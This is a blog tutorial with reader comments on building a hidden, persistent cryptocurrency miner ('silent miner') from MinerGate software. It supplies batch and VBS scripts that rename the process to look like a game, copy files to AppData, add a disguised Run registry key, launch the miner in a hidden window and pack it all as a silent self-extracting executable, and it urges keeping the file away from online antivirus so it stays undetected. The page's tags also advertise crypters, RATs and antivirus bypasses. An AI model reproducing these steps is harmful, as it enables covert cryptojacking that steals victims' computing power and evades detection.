How to make any Cryptocurrency Silent Miner (Minergate)


In this cryptocurrency-related blog article, I'll be sharing my own method of making any cryptocurrency silent miner. I previously shared monero silent miner method where I said I'll be showing another method using which you can make any cryptocurrency silent miner. So here it is in this blog article. I'll be showing you exactly how to make any cryptocurrency silent miner. It's actually based on minergate miners. Its FUD and Hidden miner which once started will mine the targeted crypto coin for you and it will be collected in your minergate profile. Secondly, the good thing about the miner is that it is persistent if you restart your pc, the miner will also automatically start in the background silently.

If you want to set up your own silent miner you don't need to start it every single time but just for once run it and it will run forever until you stop it then stick with my method and by the end of this article, you would be able to make complete working silent miner for any cryptocurrency you want like I recently made bytecoin bcn mining silent miner using this method & will make many more in the future.

That's all that I will be showing you in this tutorial so stay tuned & let's get started !!

How to make any Cryptocurrency Silent Miner,Cryptocurrency Silent Miner, Minergate Miners, minergate, silent miner builder, silent miners, miner builder, minergate mining,minergate application,crypto miner,cryptocurrency,crypto miner pc,crypto miner software,Minergate Silent Miner,XMR Miner CPU,bitcoin silent miner,btc silent miner,silent bitcoin miner,minergate silent miner builder,tigerzplace, tigerzplace.com


How to make any Cryptocurrency Silent Miner -- Minergate Miners 2020


First thing first, you will need minergate account, here I'm not going into detail about what minergate is and how it can be used to earn money. In short, it helps you to mine any cryptocurrency and you don't need that extra pool setup and all those technical stuff but just you make an account in minergate and download their miner which starts mining using your pc but that's not too good if you want mine silently or on another extra pc you have but don't want to run the miner every single time. SO for that, I'll be sharing my miner which is Safe, Fast, and FUD. You can find multiple online cryptocurrency silent miners but the thing is most of them are binded, some are a scam, some do have their own percent in the miner while my miner is purely clean and safe.
It basically has two sections, one with some vbs and batch scripts, which make the miner silent and persistent. The second section contains the minergate miner files which actually is used to mine the crypto coin you set it for.


I used xFast minergate CLI miner which is much faster than others. You can check all my files and even can replace them with the latest miner if minergate release by the time you are watching the video but for right now I updated the files for the previous monero silent miner as well as for this silent miner. So that was about the silent miner and minergate. Let's set up the minergate silent miner now.

BTW if you don't have minergate account, I'll leave my referral link in the description below. Make your account using my referral link (THANKS).

Make MinerGate Account using this link ► https://goo.gl/oD7Aos

So back to the silent miner point, you got your account right. Now the next thing is the miner and vbs scripts folder using which we will make cryptocurrency silent miner. you can download it from the link given below.

(Crypto Coins Silent Miner)
download xmr silent miner (xmr miner cpu) 2019
Silent Miner [Minergate Miners 2019] by Tigerzplace

Once you got the miner just extract it using WinRAR. Make sure you got WinRAR as we will need this further for just one point. You can download WinRAR from rarlab.com

How to make any Cryptocurrency Silent Miner,Cryptocurrency Silent Miner, Minergate Miners, minergate, silent miner builder, silent miners, miner builder, minergate mining,minergate application,crypto miner,cryptocurrency,crypto miner pc,crypto miner software,Minergate Silent Miner,XMR Miner CPU,bitcoin silent miner,btc silent miner,silent bitcoin miner,minergate silent miner builder,tigerzplace, tigerzplace.com


After extraction, you will get these files. Here now you will need to take some time setting up the silent miner. We will need to update all the scripts and then will combine them into the final silent miner for the target crypto coin for which you want to make a silent miner. We will go through 4 steps.


How to make any Cryptocurrency Silent Miner -- Minergate Miners 2020

Before starting up everything to make silent miner. Once you extract the miner file you will also find "Tigerzplace %.rar" file in the folder which is my percentage, If you are willing to include my percentage so I'll also get some earning from your miners. So just extract this file here and if you just wanna make your own miner no percent, no share , no nothing at all just yours. Then just delete this rar file and we are good to good with the other process. 

First Step | Start.bat

First of all, setting up the cryptocurrency for which you want to build the silent miner.

Right-click on "start.bat" file and click edit.
Then replace "[email protected]" with your email or username which you use for minergate account.
____________________________________________

If you don't have Minergate Account. Make one using my refer link:

____________________________________________


Now replace xmr with any coin you want to mine. let's say you want to make ETH Silent Miner. Then replace xmr with eth. If you want other coins letters to use in the miner. You can check out minergate website for more detail about every cryptocurrency and its name which you can use in the crypto silent miner. Like for monero classic you can use 'xmo'. Similarly, every cryptocurrency has its short name for miners. Make sure you check it out on minergate website.

The next thing is about CPU usage. You will notice 2 after xmr. This represents the thread that the silent miner will be used for cryptocurrency mining silently. I recommend not to use more than 2. If you want to use less CPU usage let's say 20-40% of a pc. Then I recommend using 1 instead of 2.

Lastly, you need to rename the win name in the start.bat file according to your choice. This win represents the process name. You will find win.exe in the folder. This is the actual xFast miner which I downloaded from minergate website. You can download for yourself the updated version as well if you got new updates by the time you are trying this method. It's all clean and fully open-source method. I didn't use any binded or infected application for my own purpose. It's fully clean and shared. Anyway, you need to rename win in the start file as well as in the folder.

Let's say I renamed the file in the folder to game.exe so in the start.bat file I also need to replace win with the game.

game --user [email protected] --eth 2

It will look like this after modification. Now whenever the silent miner is ready I run it. The background process name will be a game that will silently mine cryptocurrency for me. In this case, etherium mining will be done.

Now just save the 'start.bat' file and you are done with the first step.

Second Step | Setup.bat

Now the next file which you need to modify is the setup.bat. Here you will find strange % related strings. Basically in this file, we set up the target folder where the miner will be installed silently and will copy its file in the windows directory or where ever you set up the path.

So the first thing you need to modify is this string: "%appdata%"\silent
By default, the silent miner will copy itself to a folder "silent" in appdate. If you want to change the path. Just simply change "silent" with any other folder name you want. Make sure a name with no spaces or you will end up with some errors. Also, remember this path so you will further need to set it in one other file "startup.vbs" later on in this process.
Let's say I want to set a new path for the silent miner. "%appdata%"\CryptoMiner . I changed text "silent" to "CryptoMiner" so make sure you also change other text in the same file which is silent.
. I'll also need this path, later on, to set in startup.vbs file. So keep this in mind.

Now next thing is the start up key. You need to change "StartupName" with any name you want. This will be the name for start up file which someone will be able to see if they open startup tab. Let say I want to update it to game updates.

Now the next thing you need to update is the startup.vbs name which you will notice in this file. This is the file name that will be used as a startup. Earlier as we changed win to a game we also renamed the actual files in the same folder. Here if you want to change the startup.vbs name in the file you will also then need to rename the startup.vbs file outside in the folder. Let's say I want to change the name in the file to Update.vbs so also I need to rename the actual file in the folder to Update.vbs Now all after modifying the names and renaming the actual file in the folder. The string in the file will be modified like this.

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "GameUpdates" /t REG_SZ /d "%appdata%\CryptoMiner\Update.vbs" /f%appdata%\CryptoMiner\Update.vbs

%appdata%\CryptoMinert\start.vbs

Also notice how silent name is replaced with CryptoMiner after modification, and how StartupName is replaced with GameUpdates & also startup.vbs is replaced with Update.vbs keeping in mind that the actual file in the folder is also renamed as Update.vbs as it was startup.vbs before.

Third Step | startup.vbs (Update.vbs)

Now you need to do some editing in the startup.vbs. For me, it will be Updates.vbs. For your case, it will be renamed according to your choice in the second step. So for editing just right-click Update.VBS and select Edit.

Dim path
Set WshShell = CreateObject("WScript.Shell")
path = WshShell.expandEnvironmentStrings("%appdata%"\silent")
WshShell.CurrentDirectory= path
WshShell.Run chr(34) & "start.vbs" & Chr(34), 0
Set WshShell = Nothing

You will get the above code in the vbs file. Don't edit the rest lines, just replace the path with your new path which you have set in the previous second step where I told you to keep this path in mind we will need this in the further process later on. In my case, path will be modified as> Path="%appdata%"\CryptoMiner. And then save the file.


Last Step | Making Exe Silent Miner File.

NOTE: Before making it as exe silent miner, make sure you just manually check out the miner if it is working or not. After which you can go for the archiving. Its just a quick hint for making accurate silent miner.

PS: For checking just click the start.bat and check out the status, if its running without any error and you can see some hash rates stuff then you are good to go.

Now in the last step you have to make a pack exe file of the silent miner. For that select all the files except the method.txt file (which will be in the folder) and right-click it. You will get a menu in which you have to select "Add to Archive", click it. You will get an archive window with a lot of options. You just need to check "Create SFX Archive" and select the best compression method from the drop-down list on the left side labeled as "Compression Method".

Now just go to the Comment tab in the top menu bar and paste the following comments in the comment section.
____________________________________________

; The comment below contains SFX script commands

Path=%temp%
Setup=setup.vbs
TempMode
Silent=1
Overwrite=2
____________________________________________

Don't do any changes in the comments. However, if you want to change the icon of the exe file (Silent Miner). You can change that by going into an Advance tab and opening SFX options. In that go to the "Text and icon" tab and from there you can set up your own icon for the silent miner.

Now you are done with all the processes just save the file and it will create one exe file. This will be your own minergate silent miner for any cryptocurrency which in this case will be Ethereum Silent Miner.

More about the silent miner as I said earlier it will be persistent. This means as I run the silent miner, after my pc restarts the silent miner will also start mining again in the background so I don't need to restart it again and again. I just need to run it once.

Also, keep in mind that it will take some time to update the worker and hash rate status in your minergate account.

Furthermore about the silent miner, don't check it on an online anti-virus tool. Just be careful with that, never ever check such tools online otherwise it won't be undetected as much as it is now. So it's kinda request that don't check it online.

One last thing, if you want to close the silent miner just simply end the task from the task manager.

If you completely want to stop the silent miner so it doesn't start the next time you start your pc, so for that you will need to disable it from startup.

Well, that's for this tutorial. Hope you guys will find it helpful. If you find silent miner not working anymore in the future. Make sure you let me know in the comment section or on my page so I'll update it for you guys.

With that all being said I am logging out and watching the video tutorial below if you missed something in the above-written tutorial. 

How to make any Cryptocurrency Silent Miner -- Minergate Miners 2020

How to make any Cryptocurrency Silent Miner -- Minergate Miners 2020




COMMENTS

BLOGGER: 21
  1. Hello Tierzplace, I sent you a message via discord, codename:-$1L3NT-, I believe it is of extreme interest to both parties, confidential message, kindly check.

    Me Cantata, Email: [email protected]
    Discord: https://discordapp.com/channels/@me/618182875182923956

    ReplyDelete
  2. Discord User:-$1L3NT-#1296

    ReplyDelete
  3. Discord User:-$ 1L3NT-#1296

    ReplyDelete
  4. Hey! Is this method still working today?
    Thanks & keep up the good work!

    ReplyDelete
    Replies
    1. Thanks mate! Is there a method for GPU mining (ETH), too? This method is only for mining on CPU right?

      Delete
    2. Well yes but not sure if GPU miners for minergate is supporting ETH or not if yes then it's possible with the same method all a user need is to replace the CPU miner of minergate with the GPU version. Rest of the method is the same to make it silent miner.

      Delete
    3. Hello, is there a way to set Unmineable to mine in an automatic and hidden way?

      Delete
    4. hey is this still working?

      Delete
  5. Hello sir,
    Thanks for this detailed article.
    Can I have your discord?

    ReplyDelete
  6. Hello brother ! Created the silent miner, working perfectly. I have a question, how do we do if we want a gpu miner ? I want to create one so can you detail the steps ?

    Thank you bro !

    ReplyDelete
    Replies
    1. You can put -g in the end of mining line, in the start.bat file.
      i.e: game --user [email protected] --eth 2 -g


      If not working then you can check by using command miner.exe -h to list all the commands, but I think it will work as far as I remember.

      Delete
  7. bro can i have your discord pls urgeeent pls

    ReplyDelete
  8. Bro pls make tutorial for android silent miners

    ReplyDelete
  9. Hey buddy bug fan here, I downloaded your cryptominner.rar file but it is asking for a password to un zip the file, what do I do? What's the password?

    ReplyDelete
  10. Hi,The file in the download link is not the same with the one in the video

    ReplyDelete
    Replies
    1. Yup it's not updated. Method for the updated file is listed in above blog article.

      Delete

Name

Accept All Friend Requests Facebook,1,Accept All Friend Requests Facebook Javascript 2020,1,add friends request script,1,Add multiple friends,1,Add multiple friends using add friends request script,1,android,2,android app,1,android app development,2,android app development course,1,android app development course for beginners,1,android app development free,1,android app development how to,1,android studio,1,android studio tutor,1,android studio tutorial for beginners,1,app development free,1,Apple Is Delaying Its Plan To Scan US,1,apple to scan iphones,1,apple to scan us iphones abuse,1,auto add friend facebook tool,1,auto post facebook,1,auto poster,2,b4u global,1,b4u global latest news,1,b4u global profit,1,b4u updates 2022,1,B64 crypter,1,best facebook auto poster,2,best free seo tools,1,best free seo tools 2018,1,Best Gaming Site,1,blog seo,1,boost internet speed,2,btc silent miner,1,bypass facebook verification,1,Bypass Malware Byte,1,Bypass windows defender,1,bytcoin,1,bytcoin bcn,1,bytcoin bcn mining,1,bytcoin bnc,1,bytcoin crypto,1,bytecoin bcn mining silent miner,1,bytecoin faucet,1,claim as facebook group admin tool,1,claim as group admin,1,claim as group admin facebook,1,claim as group admin script,2,claim as group admin tool,1,convert image to ms word file,1,convert image to ms word online,1,convert image to text characters,1,Convert Text to Video,1,courses for ethical hacking,1,create facebook direct report link,1,create short report link,2,Crypt a rat,1,Crypt a rat with Reverse Base64 FUD Crypter,1,crypter,2,crypto miner pc,1,cryptocurrency,4,Cryptocurrency Silent Miner,2,CyberSpace,2,dashboard.securereannex.com,1,Delete Facebook Messenger Messages,1,delete for everyone in facebook,1,delete Instagram account,1,delete Instagram account permanently,1,direct report link,1,Disable Seen Feature in Facebook Chat,1,disable seen option,1,download a game for free,1,download facebook videos,1,download game,1,download games for free,1,Download Games for PC,1,download games online,1,download videos from facebook for free.,1,earn online money,4,earning,6,earning money,2,ethical hacking,1,ethical hacking course,1,ethical hacking tutorials,1,exe file binder,1,Facbook Social Toolkit Free License Key,1,Facebook,16,facebook auto group poster,2,facebook auto group poster software,1,facebook auto poster 2019,1,facebook auto poster chrome extension,1,facebook auto poster groups,1,facebook auto report bot,2,facebook auto report tool,2,facebook auto reporter,2,Facebook Auto Reporter v2,1,facebook email scraper,1,facebook group claim 2020,1,facebook message delete,1,facebook messages seen disable method,1,facebook photo tag verification trick,1,facebook seen disable,1,Facebook Social Toolkit,2,Facebook Social Toolkit Key,2,Facebook Social Toolkit License Key For Free,2,facebook social toolkit سيريال,3,facebook toolkit,2,facebook trick,1,FAR2,1,fb auto reporter,1,FB Email Bruter,1,fb photo verification,1,file binder,1,file binder software,1,file binders software,1,find facebook hidden email address,1,Find hidden email accounts free,1,Firefox,1,Firefox dmg,1,Firefox For Mac,1,free call internet to mobile,1,free call to usa online,1,free calls online,1,free facebook downloader,1,free games download,1,free international calls app,1,free online calling,1,free transcribe audio to text,1,fully undetected,1,Games,3,gpu mining,1,hackersploit,1,hacking tutorials,1,hacking tutorials with kali linux,1,how to bind any files without file binder software,1,how to claim facebook group without admin 2020,2,how to confirm all friend requests on facebook at once,1,how to convert image to text in pc,1,how to crypt a rat,2,how to delete instagram account,1,how to delete instagram account permanent,1,how to download facebook videos free,1,how to earn money,1,How to Free Calls Online,1,How to increase internet speed,1,How to install firefox on mac,1,how to post on facebook groups,1,how to rank youtube videos fast,1,how to remove account from instagram,1,how to report on facebook,2,how to see asterisk email,1,increase download speed,1,increase internet speed,1,increase internet speed comcast,1,Internet,7,internet-softwares,5,invisible in fb,1,iphone,1,keyword tool seo,1,learn php,1,learn php fast,1,learn php online,1,mac-softwares,1,make direct report link,1,make free calls online,1,make me admin facebook group,1,make money,1,make money online fast.make money online,1,make money online for free,1,make money online free,1,make money online trading,1,Mine Monero,1,mine monero in browser,1,mine monero with cpu,1,miner builder,1,minergate,3,minergate download,1,Minergate Miners,1,Minergate Silent Miner,1,minergate silent miner builder,1,mining,2,Mob-Apps,1,Mob-Games,1,Mob-Tips-Tricks,1,Mob/Network,2,monero miner,1,monero hashrate,1,Monero Mining,1,monero wallet,1,mymonero,1,News,1,njrat crypter,1,oceanofgames,1,on page seo,2,pc games,3,PC-Tricks,4,penetration testing,1,php tutorial for beginners,1,php tutorials,1,php video tutorials free,1,php video tutorials free download,1,premium seo tools,1,Programming/Web,4,python for beginners,1,python full course,1,python tutorial,1,python tutorial download,1,python tutorial for beginners free,1,python tutorial free,1,python tutorial youtube,1,rank youtube videos,1,rank youtube videos higher,1,rank youtube videos on google,1,rats,1,remove for everyone facebook,1,report on facebook,3,reveal asterisk email address,1,search engine optimization,1,secure reannex srg login,1,securereannex,1,securereannex login,1,securereannex.com,1,seo,4,seo basics,2,seo blogging tips,2,seo checker,1,seo for beginners,2,seo for blog posts,2,seo tools,1,seo tutorial,1,short reporting link,1,silent bitcoin miner,1,silent miner,1,Software,1,Softwares,8,speed post tracking,1,SRG world,1,tekken,1,tekken 3,1,tekken 3 arcade game,1,tekken 3 characters,2,tekken 3 download game,1,tekken 3 game,1,tekken 3 game download for pc,1,tekken 3 game to download,1,tekken 3 games,1,tekken 3 the game,1,tekken 6,1,tekken 6 online pc,1,tekken 6 pc game,1,tekken 6 setup free download for pc,1,tekken game,1,TFF Premium,1,tool seo youtube,1,toolkit for facebook,4,toolkit for facebook android,1,toolkit for facebook by plugex,2,toolkit for facebook chrome extension,1,toolkit for facebook latest version,1,toolkit for fb,1,toolkit for fb by plugex,1,toolkit for fb by plugex license key,1,transcribe video to text,2,transcribe video to text free,1,transcribe videos,2,Tricks & Tutorials,13,unsend a facebook message,1,Vid2Text,1,Video to Text Conversion,1,Video to Text Transcription,1,Videos,5,Videototext,1,VTT-Snap,1,whatsapp hack,1,whatsapp secrets,1,whatsapp trick,1,whatsapp tricks,1,whatsapp tutorials,1,xmr cpu miner,1,xmr miner,1,XMR Silent Miner,1,xmrig cpu miner,1,youtube seo,1,youtube transcript,1,youtube video ranking,1,youtube video transcript,2,zcash,1,zcash faucets,1,zcash mining,1,zcash mining pool,1,zcash mining software,1,zcash silent miner,1,zcash zec,1,zec silent miner,1,
ltr
item
Tigerzplace: How to make any Cryptocurrency Silent Miner (Minergate)
How to make any Cryptocurrency Silent Miner (Minergate)
In this cryptocurrency related blog article I'll be sharing my own method of making any cryptocurrency silent miner. I previously shared monero silent miner method where I said I'll be showing another method using which you can make any cryptocurrency silent miner. So here it is in this blog article. I'll be you showing you exactly how to make any cryptocurrency silent miner. Its actually based on minergate miners. Its FUD and Hidden miner which once started will mine the targeted crypto coin for you and it will be collected in your minergate profile. Secondly the good thing about the miner is that it is persistent like if you restart your pc, the miner will also automatically start in the background silenty.
https://1.bp.blogspot.com/-gRotYVSaLVU/XMBoOkwFhQI/AAAAAAAAB7Q/E7NFE85hH9cPUUzcCEV4yK3SrkIJFnngACPcBGAYYCw/w320-h180/How%2Bto%2Bmake%2Bany%2BCryptocurrency%2BSilent%2BMiner%2B--%2BMinergate%2BMiners%2B2019.jpg
https://1.bp.blogspot.com/-gRotYVSaLVU/XMBoOkwFhQI/AAAAAAAAB7Q/E7NFE85hH9cPUUzcCEV4yK3SrkIJFnngACPcBGAYYCw/s72-w320-c-h180/How%2Bto%2Bmake%2Bany%2BCryptocurrency%2BSilent%2BMiner%2B--%2BMinergate%2BMiners%2B2019.jpg
Tigerzplace
http://www.tigerzplace.com/2019/05/how-to-make-any-cryptocurrency-silent-miner-minergate-miners.html
http://www.tigerzplace.com/
http://www.tigerzplace.com/
http://www.tigerzplace.com/2019/05/how-to-make-any-cryptocurrency-silent-miner-minergate-miners.html
true
9025910942251181934
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy Table of Content